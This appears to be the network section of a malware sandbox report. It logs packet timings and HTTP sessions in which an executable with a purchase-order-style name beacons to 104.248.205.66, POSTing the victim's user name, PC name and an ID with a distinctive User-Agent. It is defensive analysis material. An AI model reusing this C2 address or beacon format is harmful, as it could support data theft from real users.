Aug 29, 2024 12:04:19.961464882 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:19.961508989 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:19.961508989 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:19.961508989 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:19.962331057 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:19.962383032 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:19.966356993 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:19.966420889 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:20.101572990 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:20.106779099 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:20.106884003 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:20.109291077 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:20.114180088 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:20.114259005 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:20.121015072 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.379086971 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.379106998 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.379118919 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.379134893 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.379149914 CEST	80	49756	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.379291058 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.379291058 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.379291058 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.379707098 CEST	49756	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.522011042 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.527235031 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.527343988 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.529500961 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.534312963 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:22.534398079 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:22.539742947 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.029134035 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.029160976 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.029174089 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.029294014 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.029330015 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.029340029 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.029392958 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.029392958 CEST	49757	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.037082911 CEST	80	49757	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.175771952 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.184052944 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.184303999 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.186475992 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.191329956 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:25.191401958 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:25.196101904 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.434865952 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.434894085 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.434905052 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.434916973 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.434933901 CEST	80	49758	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.434952021 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.434992075 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.434992075 CEST	49758	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.582335949 CEST	49759	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.587223053 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.587305069 CEST	49759	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.589426041 CEST	49759	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.594192028 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:27.594258070 CEST	49759	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:27.599113941 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:29.944237947 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:29.944261074 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:29.944267988 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:29.944273949 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:29.944426060 CEST	49759	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:29.944504023 CEST	49759	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:29.949280977 CEST	80	49759	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:30.087239027 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:30.092143059 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:30.092255116 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:30.094477892 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:30.099293947 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:30.099349976 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:30.104111910 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.405469894 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.405492067 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.405522108 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.405535936 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.405549049 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.405616045 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.405668020 CEST	49760	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.410450935 CEST	80	49760	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.554689884 CEST	49761	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.559664011 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.559787035 CEST	49761	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.561924934 CEST	49761	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.566756010 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:32.566845894 CEST	49761	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:32.571666002 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.819025040 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.819053888 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.819070101 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.819082975 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.819178104 CEST	49761	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:34.819220066 CEST	49761	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:34.823971033 CEST	80	49761	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.958058119 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:34.963033915 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.963125944 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:34.965296030 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:34.970172882 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:34.970293999 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:34.975054026 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.279594898 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.279619932 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.279630899 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.279645920 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.279738903 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.279774904 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.279783010 CEST	49762	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.285036087 CEST	80	49762	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.428576946 CEST	49763	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.433713913 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.433815956 CEST	49763	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.436065912 CEST	49763	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.441315889 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:37.441389084 CEST	49763	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:37.446496964 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.676668882 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.676688910 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.676700115 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.676711082 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.676820040 CEST	49763	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:39.676917076 CEST	49763	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:39.681843042 CEST	80	49763	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.817766905 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:39.824614048 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.824759007 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:39.826894999 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:39.833360910 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:39.833420992 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:39.838231087 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.108746052 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.108766079 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.108783007 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.108797073 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.108846903 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.108886003 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.108912945 CEST	49764	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.114933968 CEST	80	49764	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.254905939 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.259987116 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.260087967 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.262300968 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.267894983 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:42.267991066 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:42.272836924 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.657943964 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.658031940 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.658044100 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.658056021 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.658104897 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.658145905 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.658185005 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.658333063 CEST	80	49765	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.658382893 CEST	49765	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.803018093 CEST	49766	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.811494112 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.811609030 CEST	49766	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.813699961 CEST	49766	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.822046041 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:44.823781967 CEST	49766	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:44.834974051 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.124341011 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.124361038 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.124373913 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.124387026 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.124399900 CEST	80	49766	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.124603033 CEST	49766	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:47.124711037 CEST	49766	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:47.282582998 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:47.287744045 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.287945032 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:47.290076971 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:47.294985056 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:47.295064926 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:47.301003933 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:49.551826000 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:49.551848888 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:49.551867008 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:49.551881075 CEST	80	49767	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:49.551950932 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:49.552021027 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:49.552090883 CEST	49767	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:49.556924105 CEST	80	49767	104.248.205.66	192.168.2.8

HTTP Request Dependency Graph

104.248.205.66

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:02:51.192383051 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 180 Connection: close
Aug 29, 2024 12:02:51.197441101 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.ruhubert813848HUBERT-PCk0FDD42EE188E931437F4FBE2C1y2PQ
Aug 29, 2024 12:02:53.421875000 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:02:51 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:02:53.421946049 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:02:53.422004938 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49714	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:02:53.563101053 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 180 Connection: close
Aug 29, 2024 12:02:53.568454027 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.ruhubert813848HUBERT-PC+0FDD42EE188E931437F4FBE2Co2Qly
Aug 29, 2024 12:02:56.010449886 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:02:54 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:02:56.010462046 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:02:56.010476112 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:02:56.010531902 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:02:56.080645084 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:02:56.085560083 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:02:58.527046919 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:02:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 